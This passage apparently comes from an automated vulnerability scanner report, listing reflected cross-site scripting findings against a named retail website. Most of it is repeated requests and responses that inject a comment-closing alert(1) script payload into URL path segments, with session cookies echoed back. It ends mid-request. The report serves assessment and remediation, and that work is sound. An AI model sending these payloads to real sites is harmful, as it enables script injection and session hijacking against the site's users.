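        "REDIRECT_SCRIPT_URL": f"/menu{COMMENT_PAYLOAD}/mmenudom.js",
    }
    query = f"ruleID=145&itemID=236&itemType=CATEGORY{ATTR_PAYLOAD}&path=1%2C2%2C195%2C236"
    return {
        "comment_vulnerable": live_script_elements(render_debug_comment(env, safe=False)),
        "comment_fixed": live_script_elements(render_debug_comment(env, safe=True)),
        "attribute_vulnerable": live_script_elements(render_form(query, safe=False)),
        "attribute_fixed": live_script_elements(render_form(query, safe=True)),
    }


if __name__ == "__main__":
    for case, n in demo().items():
        print(f"{case:22s} live <script> elements: {n}")
```

Two design points. Comment-context encoding replaces every hyphen rather than just the pair in '-->' because a single stray '-' adjacent to an existing one in the template would recreate the terminator; attribute-context encoding uses html.escape with quote=True so the same helper stays correct if a template later switches to single quotes. The stronger remedy, which this example cannot show, is not to write request data into comments at all and not to ship an error page that dumps the CGI environment (the captured responses show it includes the request's Cookie header, JSESSIONID and all) to the client.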

Request

GET /templates/custservcontactus.jsp?ruleID=1455b8e8--><script>alert(1)</script>5080cc77d69cd4dfb&itemID=236&itemType=CATEGORY&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.territoryahead.com
Cookie: order=62380172; customer=92643794; mmlID=68408300; JSESSIONID=aTtg_UkbQc6f
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 500 Internal Server Error
Date: Wed, 02 Mar 2011 18:42:58 GMT
Server: Apache
ETag: "AAAAS5332LN"
Last-Modified: Wed, 02 Mar 2011 18:40:51 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
ipt%3Ealert%281%29%3C%2Fscript%3E5080cc77d69cd4dfb&submit.y=13&Email=&itemID=1&Topic=&LName=&Message=&itemType=ErrorPage&path=1%2C2%2C195%2C236&submit.x=46&FName=&itemType=ErrorPage&itemID=1&ruleID=1455b8e8--><script>alert(1)</script>5080cc77d69cd4dfb&itemID=236&itemType=CATEGORY&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13
Session ID: aTtg_UkbQc6f (from cookie)

Parameters:
submit.y = 13
submit.y = 13
...[SNIP]...

1.37. http://www.territoryahead.com/text/cm/cmdatatagutils_territoryahead.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/cm/cmdatatagutils_territoryahead.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload d2219--><script>alert(1)</script>99acf92d2db was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /textd2219--><script>alert(1)</script>99acf92d2db/cm/cmdatatagutils_territoryahead.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:17:13 GMT
Server: Apache
ETag: "AAAAS53+4e6"
Last-Modified: Wed, 02 Mar 2011 19:11:36 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: wqQWQqwSrRQAABCQmNsAAAAC
REDIRECT_SCRIPT_URL: /textd2219--><script>alert(1)</script>99acf92d2db/cm/cmdatatagutils_territoryahead.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/textd2219-->
...[SNIP]...

1.38. http://www.territoryahead.com/text/cm/cmdatatagutils_territoryahead.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/cm/cmdatatagutils_territoryahead.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload e9f54--><script>alert(1)</script>dcd4db6be5d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/cme9f54--><script>alert(1)</script>dcd4db6be5d/cmdatatagutils_territoryahead.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:26:23 GMT
Server: Apache
ETag: "AAAAS53+43K"
Last-Modified: Wed, 02 Mar 2011 19:11:37 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 42nuUqwSrSgAAGbiDpUAAAAF
REDIRECT_SCRIPT_URL: /text/cme9f54--><script>alert(1)</script>dcd4db6be5d/cmdatatagutils_territoryahead.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/cme9f54-->
...[SNIP]...

1.39. http://www.territoryahead.com/text/cm/cmdatatagutils_territoryahead.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/cm/cmdatatagutils_territoryahead.js

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 876b8--><script>alert(1)</script>898944d08eb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/cm/cmdatatagutils_territoryahead.js876b8--><script>alert(1)</script>898944d08eb HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:17:16 GMT
Server: Apache
ETag: "AAAAS53+5Q0"
Last-Modified: Wed, 02 Mar 2011 19:11:39 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: wtTVZ6wSrRQAAG-5D0EAAAAG
REDIRECT_SCRIPT_URL: /text/cm/cmdatatagutils_territoryahead.js876b8--><script>alert(1)</script>898944d08eb
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/cm/cmdatatagutils_territoryahead.js876b8-->
...[SNIP]...

1.40. http://www.territoryahead.com/text/cm/cmtaggingservices_TTA_bottom.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/cm/cmtaggingservices_TTA_bottom.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 14102--><script>alert(1)</script>fe5c691b78e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text14102--><script>alert(1)</script>fe5c691b78e/cm/cmtaggingservices_TTA_bottom.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:17:18 GMT
Server: Apache
ETag: "AAAAS53+5qP"
Last-Modified: Wed, 02 Mar 2011 19:11:41 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: wu2qGawSrRQAAG6FzIoAAAAO
REDIRECT_SCRIPT_URL: /text14102--><script>alert(1)</script>fe5c691b78e/cm/cmtaggingservices_TTA_bottom.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text14102-->
...[SNIP]...

1.41. http://www.territoryahead.com/text/cm/cmtaggingservices_TTA_bottom.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/cm/cmtaggingservices_TTA_bottom.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload ab577--><script>alert(1)</script>0084ffb2ffb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/cmab577--><script>alert(1)</script>0084ffb2ffb/cmtaggingservices_TTA_bottom.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:26:28 GMT
Server: Apache
ETag: "AAAAS53+6CO"
Last-Modified: Wed, 02 Mar 2011 19:11:42 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 47MZm6wSrSgAAGSt-sEAAAAM
REDIRECT_SCRIPT_URL: /text/cmab577--><script>alert(1)</script>0084ffb2ffb/cmtaggingservices_TTA_bottom.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/cmab577-->
...[SNIP]...

1.42. http://www.territoryahead.com/text/cm/cmtaggingservices_TTA_bottom.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/cm/cmtaggingservices_TTA_bottom.js

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload fc136--><script>alert(1)</script>67c581b4d0f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/cm/cmtaggingservices_TTA_bottom.jsfc136--><script>alert(1)</script>67c581b4d0f HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:26:30 GMT
Server: Apache
ETag: "AAAAS53+6eg"
Last-Modified: Wed, 02 Mar 2011 19:11:44 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 487bdawSrSgAAD2JIk4AAAAh
REDIRECT_SCRIPT_URL: /text/cm/cmtaggingservices_TTA_bottom.jsfc136--><script>alert(1)</script>67c581b4d0f
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/cm/cmtaggingservices_TTA_bottom.jsfc136-->
...[SNIP]...

1.43. http://www.territoryahead.com/text/cm/eluminate.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/cm/eluminate.js

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload d9eba--><script>alert(1)</script>56ca91e0499 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /textd9eba--><script>alert(1)</script>56ca91e0499/cm/eluminate.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:26:34 GMT
Server: Apache
ETag: "AAAAS53+7ln"
Last-Modified: Wed, 02 Mar 2011 19:11:49 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 5BRRcawSrSgAAAIpggAAAAAJ
REDIRECT_SCRIPT_URL: /textd9eba--><script>alert(1)</script>56ca91e0499/cm/eluminate.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/textd9eba-->
...[SNIP]...

1.44. http://www.territoryahead.com/text/cm/eluminate.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/cm/eluminate.js

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload fd889--><script>alert(1)</script>fe7567650a7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/cmfd889--><script>alert(1)</script>fe7567650a7/eluminate.js HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:26:36 GMT
Server: Apache
ETag: "AAAAS53+8Dl"
Last-Modified: Wed, 02 Mar 2011 19:11:51 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 5DFt1awSrSgAAGQps4gAAAAx
REDIRECT_SCRIPT_URL: /text/cmfd889--><script>alert(1)</script>fe7567650a7/eluminate.js
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/cmfd889-->
...[SNIP]...

1.45. http://www.territoryahead.com/text/cm/eluminate.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/cm/eluminate.js

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload e3a7f--><script>alert(1)</script>1ac82b72f80 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/cm/eluminate.jse3a7f--><script>alert(1)</script>1ac82b72f80 HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:26:38 GMT
Server: Apache
ETag: "AAAAS53+8bX"
Last-Modified: Wed, 02 Mar 2011 19:11:52 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
ie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 5EjHR6wSrSgAAF3LF5cAAAAL
REDIRECT_SCRIPT_URL: /text/cm/eluminate.jse3a7f--><script>alert(1)</script>1ac82b72f80
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/cm/eluminate.jse3a7f-->
...[SNIP]...

1.46. http://www.territoryahead.com/text/css/tta_stylesheet.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/css/tta_stylesheet.css

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload b9319--><script>alert(1)</script>55d99e12a4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /textb9319--><script>alert(1)</script>55d99e12a4/css/tta_stylesheet.css HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:15:44 GMT
Server: Apache
ETag: "AAAAS53+in8"
Last-Modified: Wed, 02 Mar 2011 19:10:06 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: vU3mk6wSrRQAAHbd-MwAAAAU
REDIRECT_SCRIPT_URL: /textb9319--><script>alert(1)</script>55d99e12a4/css/tta_stylesheet.css
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/textb9319-->
...[SNIP]...

1.47. http://www.territoryahead.com/text/css/tta_stylesheet.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/css/tta_stylesheet.css

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 3b0b3--><script>alert(1)</script>c8399a24e0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/css3b0b3--><script>alert(1)</script>c8399a24e0e/tta_stylesheet.css HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:15:45 GMT
Server: Apache
ETag: "AAAAS53+jFA"
Last-Modified: Wed, 02 Mar 2011 19:10:08 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: vWpFiKwSrRQAABOyNFwAAAC5
REDIRECT_SCRIPT_URL: /text/css3b0b3--><script>alert(1)</script>c8399a24e0e/tta_stylesheet.css
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/css3b0b3-->
...[SNIP]...

1.48. http://www.territoryahead.com/text/css/tta_stylesheet.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/css/tta_stylesheet.css

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload c3030--><script>alert(1)</script>0d322327f28 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text/css/tta_stylesheet.cssc3030--><script>alert(1)</script>0d322327f28 HTTP/1.1
Host: www.territoryahead.com
Proxy-Connection: keep-alive
Referer: http://www.territoryahead.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-

Response

HTTP/1.1 200 OK
Date: Wed, 02 Mar 2011 19:24:56 GMT
Server: Apache
ETag: "AAAAS53+juj"
Last-Modified: Wed, 02 Mar 2011 19:10:11 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


<meta name="ve
...[SNIP]...
er=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 3kDtuawSrSgAAGQksbAAAAAa
REDIRECT_SCRIPT_URL: /text/css/tta_stylesheet.cssc3030--><script>alert(1)</script>0d322327f28
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/css/tta_stylesheet.cssc3030-->
...[SNIP]...

1.49. http://www.territoryahead.com/text/css/tta_stylesheet_ie7.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.territoryahead.com
Path:   /text/css/tta_stylesheet_ie7.css

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 3e903--><script>alert(1)</script>05a8b0354fb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /text3e903--><script>alert(1)</script>05a8b0354fb/css/tta_stylesheet_ie7.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
